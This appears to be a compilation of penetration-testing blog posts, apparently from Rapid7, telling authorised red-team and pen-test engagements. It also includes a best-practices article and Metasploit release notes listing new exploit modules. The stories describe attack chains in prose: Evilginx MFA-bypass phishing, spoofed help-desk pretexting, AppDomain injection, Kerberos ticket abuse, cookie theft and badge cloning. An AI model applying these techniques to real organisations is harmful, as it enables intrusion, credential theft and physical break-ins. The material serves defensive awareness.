Breaking In So You Don’t Have To

Under The Hoodie: The Pen Test Diaries

Each year, Rapid7 penetration testers conduct over 1,000 security assessments, pushing boundaries to expose vulnerabilities before the bad guys do. The mission? Get in, escalate privileges, and own the environment—physically, digitally, or sometimes just by sweet-talking an unsuspecting employee.

Names? Redacted. Companies? Anonymized. But the hacks? Real.

Welcome to Under the Hoodie, where we share stories straight from the frontlines of ethical hacking. Below are real accounts from our testers, revealing just how easy it can be to break into supposedly secure environments. Click through to hear each story unfold.

1. The Law Firm’s "Secure" File Share - Not So Secure

A law firm’s file storage system was sitting on the internet, just begging for a break-in. Using a mix of open-source intelligence (OSINT) and Burp Suite, our pen tester enumerated users, guessed a couple of predictable passwords (think "Winter2024!"), and walked right into confidential legal documents. Verdict? Guilty of weak security.

Hear how it happened.

2. Taking Over a College (And Its Campus Police)

Ever wondered how much damage someone could do by simply plugging into an open network jack on a college campus? Turns out, a lot. Our tester started with network poisoning attacks, cracked some hashes, and before long, had access to criminal records, police databases, PhD research, and even student grade records. Could've handed out straight A’s if they wanted.

Check out the full infiltration.

3. Hacking SQL to Crack a Corporate Network

A misconfigured Microsoft SQL server turned out to be the golden ticket for total network compromise. After gaining basic user access via weak credentials, our tester found a juicy SQL cluster, enabled some stored procedures, and pulled off process injection to gain domain admin privileges. Translation? They owned the company’s entire network from the inside out.

Listen to how it was done.

4. Breaking In With Donuts (Social Engineering for the Win)

Sometimes, hacking isn’t about code—it’s about confidence. Armed with a fake badge and a box of popular local donuts, our tester waltzed into a corporate office by leveraging good ol’ human kindness. A security guard even held the door open. The lesson? Free food lowers defenses faster than any zero-day exploit.

Hear about the sugar-powered social engineering.

5. Phishing Calls: One Password Reset Away from Total Control

A single phone call is sometimes all it takes. Our tester posed as an employee needing a password reset. After some casual chit-chat, an IT admin happily provided a fresh login. No brute force, no malware—just old-school social engineering at its finest.

Find out just how easy it was.

6. How We Almost Stole a Police Car

High-security target? Challenge accepted. Our testers, posing as IT consultants, walked right into a police department, escorted through all secure areas, and even got their hands on a set of keys to a patrol car. No alarms. No suspicion. Just a dangerously believable pretext.

Check out how close they got.

7. The Phish That Netted an Entire Finance Firm’s Data

A fake email, a cloned login page, and a hundred unsuspecting employees. Eight of them entered their credentials, and just like that, our tester had access to financial data, payroll systems, and even proxy rights to other accounts. MFA saved the day—barely.

Find out just how this phishing attack unfolded.

8. Owning a Medical Database Before the Cocoa Cooled

A health transcription company left its web app vulnerable to SQL injection. The result? Full access to sensitive medical records within minutes. The tester reported it immediately, and the company had to shut down its entire system for emergency remediation. All before their hot cocoa had a chance to cool down.

Find out how it happened.

9. No Password? No Problem. Taking Over a Network with NTLM Hashes

No cracked passwords? No worries. Our tester leveraged network sniffing, NTLM relay attacks, and Active Directory Certificate Services to escalate privileges. By the time it was over, they had full control over the company’s systems—without ever knowing a single password.

Check out the full attack.

Security Isn’t a One-Time Fix—It’s a Constant Battle

Every system has weak points—some technical, some human. The goal of penetration testing isn’t just to break in; it’s to make sure real attackers can’t.

Hear more stories from the trenches.

Penetration testing (or “ethical hacking”) is an essential practice for identifying and addressing security vulnerabilities in systems, networks, and applications. By simulating real-world cyberattacks, organizations can proactively assess their defenses and strengthen their cybersecurity posture. However, penetration testing requires skill, precision, and adherence to best practices to be effective. Below, we outline key best practices to ensure penetration tests are thorough, ethical, and lead to meaningful security improvements.

1. Define Clear Objectives and Scope

Before conducting any penetration test, it’s crucial to set clear objectives and boundaries. This includes:

• Scope: Clearly define which systems, applications, networks, or devices are to be tested. This helps prevent any accidental damage to systems outside of the agreed-upon boundaries.

• Goals: Establish what you want to achieve, whether it’s identifying vulnerabilities, testing incident response plans, or evaluating the effectiveness of specific security controls.

• Rules of Engagement: Define how the test will proceed, the hours during which testing will occur, and the severity of potential risks. This ensures alignment between the penetration testers and the organization, minimizing disruption.

Establishing these guidelines at the start ensures the test is comprehensive, focused, and aligned with organizational priorities.

2. Engage a Skilled and Certified Penetration Testing Team

A penetration test is only as good as the professionals executing it. Ensure that the penetration testers have the necessary expertise and certifications, such as:

•    Certified Ethical Hacker (CEH)
•    Offensive Security Certified Professional (OSCP)
•    Certified Information Systems Security Professional (CISSP)

These certifications, among others, demonstrate a high level of competence in identifying and exploiting security weaknesses. Ideally, testers should also have experience with the specific technology stack used by your organization, whether it’s web applications, mobile devices, or complex network infrastructures.

3. Utilize a Multi-Stage Testing Approach

Penetration testing is more effective when it is conducted in phases. A common multi-stage approach includes:

•    Reconnaissance: The tester gathers information on the target, including publicly avail-able data (such as domain names, IP addresses, and employee information) to identify potential entry points.

•    Scanning and Enumeration: Testers scan the target environment for known vulnerabilities and map out potential weak spots in networks, applications, or infrastructure.

•    Exploitation: This phase involves attempting to exploit discovered vulnerabilities. Ethical hackers may attempt to bypass authentication systems, inject malicious code, or escalate privileges, depending on the agreed-upon scope.

•    Post-Exploitation: After a vulnerability has been successfully exploited, testers assess the potential for lateral movement within the network and determine the extent of the access gained.

•    Reporting and Remediation: At the conclusion of the test, a comprehensive report is provided, detailing findings, exploited vulnerabilities, and suggested remediation steps. A clear remediation strategy is essential to help the organization strengthen its defenses.

4. Simulate Real-World Attacks (Red Teaming)

While traditional penetration testing focuses on identifying vulnerabilities, Red Teaming takes things a step further by simulating full-scale, real-world cyberattacks. Red teams act like real-world adversaries and work to bypass physical security, compromise systems, and exploit organizational weaknesses. They test not only technical security but also human factors (e.g., social engineering attacks) and organizational response capabilities.

By conducting regular Red Team assessments, organizations can better understand their overall cybersecurity readiness, including how well they detect, respond to, and recover from attacks.

5. Test Across Multiple Vectors (Web, Network, and Social Engineering)

Comprehensive penetration testing involves testing across several attack vectors. This can include:

•    Web Application Testing: Identify vulnerabilities like SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and insecure APIs.

•    Network Testing: Assess the security of your internal and external networks, identifying weak spots like open ports, misconfigurations, and outdated software.

•    Social Engineering: Attackers often exploit human weaknesses to gain access. Testing for phishing, vishing (voice phishing), and pretexting can help organizations recognize and respond to social engineering tactics.

Testing across these various vectors ensures that all potential entry points are considered and adequately protected.

6. Adhere to Legal and Ethical Standards

Penetration testing must be conducted within the boundaries of the law and ethical guidelines. Always obtain written permission from the organization to conduct the test and ensure that:

•    Consent is obtained: Without explicit authorization, penetration testing can be considered illegal hacking.

•    No damage is caused: Ethical hackers should take care to avoid causing disruptions to business operations or breaching privacy regulations (such as GDPR or HIPAA).

•    Confidentiality is maintained: Sensitive data accessed during the test must be handled with strict confidentiality. Testers should never disclose vulnerabilities to unauthorized parties.

Working within these ethical and legal boundaries protects both the testers and the organization.

7. Continuous Communication and Collaboration

Penetration testing isn’t a one-off exercise; it should be part of an ongoing, iterative process to improve security. Regular communication between the penetration testing team and the organization’s security team is vital. A collaborative approach allows both parties to:

•    Address issues promptly: Penetration testers should notify the organization of any critical vulnerabilities discovered during testing, allowing them to take immediate action.

•    Iterate testing: Penetration testing should be repeated regularly, especially after significant changes in the system, infrastructure, or software.

•    Enhance response plans: Use the results of each penetration test to improve incident response and security protocols.

8. Ensure Thorough Reporting and Actionable Remediation Plans

The final report from a penetration test should be comprehensive, clear, and actionable. Key elements of a good penetration testing report include:

•    Executive Summary: High-level findings, including the potential risks to the business.
•    Detailed Findings: A breakdown of vulnerabilities discovered, with evidence (screen-shots, logs) to support the findings.
•    Risk Assessment: Categorization of vulnerabilities based on their potential impact and likelihood of exploitation.
•    Remediation Recommendations: Clear, prioritized suggestions for fixing vulnerabilities, improving security practices, and strengthening defenses.

The remediation plan should be specific, actionable, and realistic, with timelines for addressing critical issues.

9. Retest After Remediation

Once vulnerabilities are remediated, it’s important to retest the system to ensure that fixes have been properly applied and no new vulnerabilities have been introduced. This can be done through a follow-up penetration test or a vulnerability assessment, depending on the scope of the changes made.

Conclusion

Penetration testing is a crucial aspect of any organization’s cybersecurity strategy, enabling them to identify and address vulnerabilities before malicious actors can exploit them. By following these best practices—setting clear objectives, engaging skilled testers, adopting a multi-phase approach, and fostering continuous collaboration—organizations can significantly enhance their security posture and reduce the risk of data breaches, financial loss, and reputation-al damage.

Remember, cybersecurity is an ongoing effort. Regular penetration testing, in combination with a strong security culture, will help organizations stay ahead of evolving threats in the ever-changing digital landscape.

The post Best Practices in Penetration Testing: Ensuring Robust Security appeared first on Cybersecurity Insiders.

Keys to the Kingdom - Gaining access to the Physical Facility through Internal Access

This is a story of network segmentation and the impact that seemingly trivial misconfigurations can have for your organization.

This is one of those occasions.

This particular pen test asked for goals-based assessment focusing on post-compromise activities — an attempt by the client to discover how vulnerable internal systems were to lateral movement by an attacker who had compromised the domain. Among the goals was a request to attempt to compromise the client’s Amazon Web Services (AWS) infrastructure and a secondary request to access and exploit any systems discovered to contain sensitive or critical operational data .

The domain for the internal environment was compromised within an hour and a half using common attack vectors: Responder network poisoning to obtain low-level network credentials followed by exploitation of Active Directory Certificate Services (ADCS) web enrollment vulnerabilities to escalate to a member of the ‘Domain Administrators’ group. While performing credential-stuffing attacks against several devices within the network to determine what previously compromised user accounts could access, it was noted that the testing device could access subnets containing user devices due to a lack of segmentation and access control policies. These configurations are known to provide additional layers of security to the network which can help to mitigate damage after compromises by preventing attacker movement to sensitive resources within the network .

Upon initially attempting to access the company’s confidential Google Suite resources, it was found that all requests redirected to a required Multi-Factor Authentication (MFA) request. Additionally, Remote Desktop Protocol (RDP) services had been properly secured, preventing sessions from the network of the attacking device.

Devices within the user environment were accessed through use of a common suite of testing tools which aid penetration testers in testing Windows environments and connecting to devices with compromised credentials, Impacket.  Using the ‘wmiexec’ script provided within the suite to explore the  file system for a known Software Architect’s machine, a hidden AWS folder was discovered. This folder contained credential files holding what appeared to be a recently authenticated and currently active AWS session. Through testing the credentials from the attacking machine two discoveries were made:

  1. The account was an administrator to a testing and development AWS environment
  2. This session had already authenticated through MFA

Using a tool called ‘aws_consoler’, a session was generated to allow for administrative access to the AWS Console. As MFA sessions within AWS expire within an hour by default, the first action performed with this session was to create a user account. The new account gave persistent access to the environment without needing to rely on another session credential file being obtained. While exploring virtual machines deployed within AWS, it was noted that there appeared to be no network filtering of RDP between the internal environment and the AWS environment.

An in-browser RDP session within AWS provided a graphical user interface on the EC2 instance for a server on a separate network, which then allowed for an RDP chain to be established to user devices. Upon connection to the user device, active authenticated sessions to multiple confidential resources, including event monitoring systems and GitLab, were discovered. Further enumeration revealed something that would pique the interest of any tester: access to the company’s secrets vault. This allowed access to a device with ‘Security’ in the name. This was surely an opportunity no tester would ever willingly pass up.

After successful authentication to the machine, the motherload was discovered: unrestricted feeds of all cameras on the campus, unrestricted access to file shares, and, most importantly, access to the badge printing system. Through the camera feeds, the data center could be analyzed for any potential physical vulnerabilities which might allow for physical access to the servers. Within the file shares, multiple files were discovered detailing physical security in such granularity it could be determined which rooms were left unlocked after business hours. A file containing the door pin codes and alarm codes for every employee as well as the combination to the Network Operation Center’s (NOC) physical key safe was also discovered.

This left only one piece of information needed to access the facility unimpeded: the badge. Exploring the badge printing system, the algorithm used in badge creation was discovered to be Wiegand 26 bit. This made it a simple task to create a proper access badge as all data needed to create one within the system had been obtained: the facility code and badge id for the impersonated user. Both pieces of information existed within the system for a user with free access to the entire facility and data center. Using all of the acquired data, the hex value of the code, which would be written to the card during the badge creation process, was synthesized and the card created using the popular Proxmark badge creation tool. In the process of the enumeration the picture used on the badge was also acquired, allowing for the created badge to be a high-quality facsimile of the user’s own card.

With this we had the card, the door pins, and alarm codes. These are all of the pieces needed to infiltrate the campus undetected and without restriction — a malicious actor’s dream. Add access to the NOC key safe, which would lead to Data Center access, as the cherry on the cake. All from one door control and badge system device which had not been properly protected and a lack of proper segmentation and access controls.

Penetration testers typically approach physical assessments from the angle of internal network access as a result of a physical breach, however, these configurations show that it is possible to breach the facility with information obtained from an internal breach, flipping the situation around completely. This access could be devastating to a company reliant on 24/7 business continuity, especially for clients who use and maintain Operational Technology (OT) on their campus. A network breach could lead to an attacker selling off the ‘keys to the kingdom,’ leading to additional potential physical and network breaches further down the line. When reviewing your internal environment, make sure to properly protect and segment critical security devices, and ensure adequate protections are in place on sensitive files and documents as well.

Details Matter: Pentesting a single device to guarantee security

Rapid7’s penetration testing services regularly assess internal networks of various sizes. For this particular engagement, however, Rapid7 was tasked with performing a penetration test of just one device on an internal network.

The device was being piloted for future deployment and the customer had specific concerns around the security posture of the device. Specifically, the customer tasked Rapid7 with three focus areas: First, ensure the device could not reach any hosts on a separate, segmented network. Second, ensure the standard user provided to Rapid7 could not elevate privileges and gain root access to the device. Third, ensure no unauthorized tools could be downloaded onto the device.

Beginning with segmentation validation, Rapid7 logged on to the device with the provided credentials including the dynamic proxy option. This allowed Rapid7 to run port scans from the deployed Penetration Testing Kit (PTK), but with the traffic going through the device before attempting to reach the segmented network. Rapid7 was only able to interact with hosts on the other network over ICMP and could not log in to or otherwise interact with the hosts. The current configuration of the device appeared to prevent the device from interacting with other hosts, the customer’s first concern.

Moving to privilege escalation, Rapid7 enumerated the device with the provided credentials. One step during this enumeration was to check which commands, if any, the standard user could run as root using the Linux command sudo. Among the available commands were a handful of Bash scripts. Rapid7 reviewed the permissions set on those Bash files and found an installation script was configured to only allow the low privilege user to execute the script and did not allow for reading or writing of the script. However, Rapid7 also observed this restricted file was owned by the low privilege user, which allowed modifying the permissions on the script. Rapid7 created a backup of the script and then modified the script to launch a new Bash shell. Running this modified script with sudo provided Rapid7 with root access to the device.

Enumeration of the device with root access revealed a strong firewall configuration in place which prevented the device from communicating with the segmented network or with the external web sites. Rapid7 disabled the firewall on the device and could connect to hosts on the other network as well as install additional, unauthorized tools.

Details Matter: Pentesting a single device to guarantee security

This engagement highlighted the importance of attention to detail when hardening systems. The file ownership misconfiguration on the script enabled Rapid7 to achieve all three of the customer’s concerns around the system’s security posture. The penetration test report provided by Rapid7 to the customer demonstrated the impact of the misconfiguration and outlined recommended remediation steps to secure the device.

Buying Stuff For Free From Shopping Websites

Rapid7 is often tasked with evaluating the security of e-commerce sites. When dealing directly with customer financials, the security of these transactions is a top concern. Fortunately, there are ample pre-built e-commerce platforms one can simply purchase or install. From an attacker’s perspective, these are annoying to attack since they're tested so often by the vendors maintaining the e-commerce platform.

So how do you exploit a site that’s already been thoroughly tested? There are many ways, but we’ll go over two.

One exploitation path is through insecure custom code added to the e-commerce framework. Often, the framework won't come pre-installed with a business need of the organization and it's up to your team to create custom code to perform it. If this code isn't tested and secure, there’s a chance a vulnerability can be introduced.

Another way is the leaking of secrets or guessable credentials (yes, it still happens in 2024 ). Think an admin password being somewhere it shouldn't be, credentials sold underground from a data breach, or a password that’s just the company name.

A web application security scanner can often find straightforward vulnerabilities, such as outdated software easily, but other types often require a more human touch.

What follows are two real-world examples from the Rapid7 Penetration Testing team.

Site 1 - Insecure Custom Code:

The site we were testing was geared toward both businesses and consumers using a moderately customized e-commerce platform. Business customers received special offers and bulk deals, while non-business customers didn’t. The first instinct here is to sign up as a fake business in order to get discounted products. Easy, right? But this wasn’t possible because business customers were verified manually by the site’s sales team before they could create an account, verifying the customer by asking for an account ID and invoice ID from a previous purchase. Business accounts had the ability to assign roles within their account to other users, so sales users under the business account could be configured by admin users within the business account. In theory, everyday consumers had no way of getting a business account.

As our testing continued, this functionality stayed in the back of our minds while the application was enumerated to find other functionality. The more complex the site becomes, the more functionality exists to be found, and the more likely a vulnerability is to exist. Enumeration is a tedious process, but it answers questions like: What’s in the JavaScript files? How are invoices served? How did the developers plan the authentication flow? Are there quirks with the website framework that the developers didn't think about? Every factor is considered, because you can't hack it without understanding it. Even if you don't know the code, you have to at least guess what's going on.

Eventually we found an API request in the site's JavaScript which returned the account ID of your current company along with the last 10 invoice IDs. This was not that interesting, since we didn't have a company account, so it was assumed it wouldn’t return anything. After leaving it on the backburner for a while we thought, “let’s run it anyway... for fun.”

We discovered we could create a modified version of the request that returned a company ID and 10 invoice IDs. Running the request as a separate consumer account also returned the same IDs, which could only mean one thing: One business account contained a large number of individual consumers as users..

Once the IDs were found we went through the business account creation flow as the average business user would with the two IDs. The result was admin privileges over every consumer user — all 11,000 of them. This also allowed access to user addresses, phone numbers, emails, and even invoices.

From here, it would be fairly trivial to buy things as other users by managing their settings.

This vulnerability was reported to the client and mitigated by requiring business users to go through a more stringent verification process.

Site 2 - Leaked Credentials:

This site was just a normal e-commerce site; you login and buy the product you need, and then logout. That’s it. It had virtually no custom code implemented, so most of the site was limited to the standard functionality that came with the framework. Not much complexity meant not much room to play around with vulnerabilities.

Even though few high severity vulnerabilities were found, it is important that every avenue for exploitation be attempted — within scope, of course.

This includes open source intelligence (OSINT), and when it comes to web applications there's plenty to look for.

For web applications, this typically comes down to searching Google and Wayback Machine for URLs. From a hacker's perspective, it's a good idea to have as many URLs as possible to access just to increase the attack surface. One can’t really hack a website if one doesn't know its URL.

Another target to search is the developer’s previous project. Any code they’ve ever written becomes fair game. You can often find code posted online related to the thing you're hacking. Which is exactly what we found! A developer was posting test code in a public GitHub repo, and included a folder they shouldn’t have. Inside this testing code were credentials to pull the source code for the real site from another code repository site.

Buying Stuff For Free From Shopping Websites

Inside that source code for the site were approximately 5,000 gift card codes, worth an average of $200 each.

This vulnerability was reported to the client and was mitigated by simply deleting the GitHub repository and changing the leaked credentials.

Conclusion

These are just two examples of what a successful pen test of an e-commerce site looks like. Most e-commerce platforms are heavily tested for security issues since they hold payment information, but custom code and/or configurations can often create security holes due to the additional complexity. An extremely complex exploit chain sometimes isn't really necessary to perform an exploit with high financial impact. All it really takes is a solid understanding of enumeration and a hacker's mind to process potential security holes.

GeoServer Unauthenticated RCE

Metasploit Weekly Wrap-Up 7/19/2024

This week, contributor h00die-gr3y added an interesting exploit module that targets the GeoServer open-source application. This software is used to view, edit, and share geospatial data. Versions prior to 2.23.6, versions between 2.24.0 and 2.24.3 and versions between 2.25.0 and 2.25.1 are unsafely evaluating property names as XPath expressions, which can lead to unauthenticated remote code execution. This vulnerability is identified as CVE-2024-36401, and affects all GeoServer instances. This has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic, and WPS Execute requests.

New module content (1)

GeoServer Unauthenticated Remote Code Execution

Authors: Steve Ikeoka, h00die-gr3y, and jheysel-r7
Type: Exploit
Pull request: #19311 contributed by h00die-gr3y
Path: multi/http/geoserver_unauth_rce_cve_2024_36401
AttackerKB reference: CVE-2024-36401

Description: This adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1.

Enhancements and features (1)

  • #19325 from pmauduit - Updates the TARGETURI description for the geoserver_unauth_rce_cve_2024_36401 module.

Bugs fixed (3)

  • #19322 from dledda-r7 - This fixes an issue that was causing some Meterpreters to consume large amounts of memory when configured with an HTTP or HTTPS transport that was unable to connect.
  • #19324 from adfoster-r7 - This updates the rpc_session library such that RPC-compatible modules are able to handle unknown sessions, i.e. rpc.call('session.compatible_modules', -1).
  • #19327 from dledda-r7 - This bumps the version of metasploit_payloads-mettle to pull in changes for the Linux and OS X Meterpreters. The changes fix an issue which prevented the sniffer extension from loading.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Are You Looking for ACTION?

Metasploit Wrap-Up 12/8/2023

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Metasploit Wrap-Up 12/8/2023

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die - Makes various performance and output readability improvements to Metasploit's password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there’s no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner - This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y - This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 - Updates Metasploit's Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 - Adds hierarchical search table support to Metasploit's search command functionality. The search table now includes a module's actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die - Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous - Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

PenTales: What It’s Like on the Red Team

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re sharing some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Performing a Red Team exercise at Rapid7 is a rollercoaster of emotions. The first week starts off with excitement and optimism, as you have a whole new client environment to dig into. All assets and employees are in-scope, no punches held. From a hacker mentality, it's truly exciting to be unleashed with unlimited possibilities bouncing around in your head of how you’ll breach the perimeter, set persistence, laterally move, and access the company “crown jewels.”

Then the first week comes to a close and you’ve realized this company has locked down their assets, and short of developing and deploying a 0-day, you’re going to have to turn to other methods of entry such as social engineering. Excitement dies down but optimism remains, until that first phish is immediately burned. Then the second falls flat. Desperation to "win" kicks in and you find yourself working through the night, trying to find one seemingly non-existent issue in their network, all in the name of just getting that first foothold.

One of our recent Red Teams followed this emotional roller-coaster to a ‘T’. We were tasked with compromising a software development company with the end goal of obtaining access to their code repositories and cloud infrastructure. We had four weeks, two Rapid7 pen test consultants and a lot of Red Bull to hack all the things at our disposal. We spent the first two days performing Open Source Intelligence (OSINT) gathering. This phase was a method of passive reconnaissance, in which we scoured the internet for publicly accessible information about our target company. Areas of interest included public network ranges owned by the company, domain names, recent acquisitions, technologies used within the company, and employee contact information.

Our OSINT revealed that the company was cloud-first with a limited external footprint. They had a few HTTPS services with APIs for their customers, software download portals, customer ticketing systems, the usual. Email was cloud hosted in Office365 with Single Sign-On (SSO) handled through Okta. The only external employee resources were an Extranet page that required authentication, a VPN portal which required Multi-Factor Authentication (MFA) and a certificate, email cloud hosted in Office365, and Okta to handle Single Sign-On (SSO) with MFA.

After initial reconnaissance, we determined three possible points of entry: compromise one of the API endpoints, phish a user with a payload or MFA bypass, or guess a password and hope it can sign into something without MFA required. We spent our first two days combing over the customer’s product API documentation and testing for any endpoints which could be accessed without authentication or exploited to gain useful information. We were stonewalled here — kudos to the company.

Gone Phishin’

Our optimism and excitement was still high, however, as we set our eyes on plan B, phishing employees. We whipped up a basic phishing campaign that masqueraded as a new third-party employee compliance training portal. To bypass web content filtering, we purchased a recently expired domain that was categorized as “information/technology.” We then created a fake landing page with our new company logo and a “sign in with SSO” button.

Little did the employees realize, while they saw their normal Okta login page, it was a proxy-phishing page using Evilginx that would capture their credentials and authenticated Okta session. The only noticeable difference was the URL. After capturing the employee’s Okta session we redirected them back to our fake third-party compliance platform, where they were requested to download an HTML Application (HTA) file containing our payload.

We fired off this phishing campaign to 50 employee email addresses discovered online, ensuring that anyone with “information security” in their title was removed from the target list. Then we waited. One hour went by. Two. Three. No interactions with the campaign. The dread was starting to sit in. We suspected that a day of hard work to build the entire campaign was eaten by a spam filter, or worse, identified and the domain was instantly blocked.

With defeat looming, we began preparing a second phishing campaign, when all of the sudden our TMUX session with Evilginx running showed a blob of green text. A valid credential was captured as well as an Okta session token. We held our breath as we switched to our Command and Control (C2) server dashboard, fingers crossed, and there it was. A callback from the phished user’s workstation. They opened the HTA on their workstation. It bypassed the EDR solution and executed our payload. We were in.

The thrill of establishing initial access is exhilarating. However, it's at this moment that we have to take a deep breath and focus. Initial access by phishing is a fragile thing, if the user reports it, we’ll lose our shell. If we trip an alert within the EDR, we’ll lose our shell. If the user goes home for the night and restarts their computer before we can set persistence, we’ll lose our shell.

First things first, we quickly replaced our HTA payload on the phishing page with something benign in case the campaign was reported and the Security Operations Center (SOC) triaged the landing page. We can’t have them pulling Indicators of Compromise (IoCs) out of our payload and associating it with our initial access host in their environment. From here, one operator focused on setting persistence and identifying a lateral movement path while the other operator used stolen Okta session tokens to review the user’s cloud applications before it expired. Three hours in and we still had access, reconnaissance was underway, and we had identified a few juicy Kerberoastable service accounts that if cracked would allow lateral movement.

Things were going our way. And then it all came crashing down.

At what felt like a crescendo of success, we received another successful phish with credentials. We cracked the service account password that we had Kerberoasted, and… lost our initial access shell.  Looking in the employee’s Teams messages, we saw messages from the SOC asking about suspicious activity on their asset as they prepared to quarantine it. Deflated and tired, back to the drawing board we went. But, like all rollercoasters, we started going back uphill when we realized the most recent credentials captured were for an intern on the help desk team. While the tier one help desk employee didn’t have much access in the company, they could view all available employee support tickets in the SaaS ticketing solution. Smiling ear to ear, we assumed our role as the helpful company IT helpdesk.

Hi, We’re Here to Help

We quickly crafted a payload that utilized legitimate Microsoft binaries packaged alongside our malicious DLL, loaded in via AppDomain injection, and packaged nicely into an ISO. We then identified an employee who had submitted a ticket to the help desk asking for assistance with connecting to an internal application which was throwing an error. Taking a deep breath, we spoofed the help desk phone number and called the employee in need of assistance.

“Hi ma’am, this is Arthur from the IT help desk. We received your ticket regarding not being able to connect to the portal, and would like to troubleshoot it with you. Is this a good time?”

Note: you might be wondering what the employee could have done better here, but in the end, the responsibility lay with the company not having multi-factor on their help desk portal. It gave us the information we needed to answer any question the employee could ask, as the help desk.

The employee was thrilled to get assistance so quickly from the help desk. We even went the extra mile and spent time trying to troubleshoot the actual issue with the employee, receiving thanks for our efforts. Finally, we asked the employee to try applying “one last update” that may resolve the issue. We directed them to go to a website hosting our payload, download the ISO, open it, and run the “installer.” They obliged, as we had already built rapport throughout the entire call. Moments later, we had a shell on the employee’s workstation.

With a shell, cracked service account credentials, and all the noisy reconnaissance out of the way from our first shell, we dove right into the lateral movement. The service account allowed  us to access an MSSQL server as an admin. We mounted the C$ drive of the server and identified already installed programs which utilized Microsoft’s .NET framework. We uploaded a malicious DLL and configuration file and remotely executed the installed program using Windows Management Instrumentation (WMI), again utilizing AppDomain injection to load our DLL. Success! We received a callback to our new C2 domain from the MSSQL server. Lateral movement hop number one, complete.

Using Rubeus, we checked for Kerberos tickets in memory and discovered a Kerberos Ticket Granting Ticket (KRBTGT) cached for a Domain Admin user. The KRBTGT could be used in a Pass-the-Ticket (PTT) attack to authenticate as the account, which meant we had Domain Admin access until the ticket expired in approximately four more hours. Everything was flowing  and we were ready for our next setback. But it didn’t come. Instead, we used the ticket to authenticate to the workstation of a cloud administrator employee and establish yet another shell on the host. Luckily for us, the company had everyone’s roles and titles in their Active Directory descriptions, and employee workstations also contained the associated employee name in the description field, which made identifying the cloud admin employee’s workstation a breeze.

Using our shell on the cloud administrator’s workstation, we executed our own Chrome cookie extractor, “HomemadeChocolateChips,” in memory, which spawned Chrome with a debug port and extracted all cookies from the current user’s profile. This provided us with an Okta session token, which we used in conjunction with a SOCKS proxy through the employee’s machine to access their Okta dashboard sourced from an internal IP address. The company had it configured such that once authenticated to Okta, if coming from the company’s IP space, the Azure Okta chiclet did not prompt for MFA again. With a squeal of excitement, we were into their Azure Portal with admin privileges.

In Azure, there is a handy feature under a virtual machine’s configuration and operations tab called “Run Command.” This allows an administrator to do just as it states, run a PowerShell script on the virtual machine. As if it couldn’t get any easier, we identified a virtual machine labeled “Jenkins Build Server” with “Run Command” enabled. After running a quick PowerShell script to download our zip file with backdoored legitimate binaries, expand the archive, and then execute them, we established a C2 foothold on the build server. From there we found GitHub credentials utilized by build jobs, which let us access our objective: source code for company applications.

Exhausted but triumphant, with bags under our eyes and shaking from the caffeine induced energy, we set up a few long-haul C2 connections to maintain persistent network access through the end of the assessment. We also met with the client to determine our next steps, such as intentionally alerting their security team to the breach. Well, after a good beer and nap over the weekend, that is.

The preceding story was an amalgamation of several recent attack workflows to obfuscate client identity and showcase one cohesive assessment.

PenTales: A Badge, a Tag, and a Bunch of Unattended Chemicals; Why Physical Social Engineering Engagements are an Important Part of Security

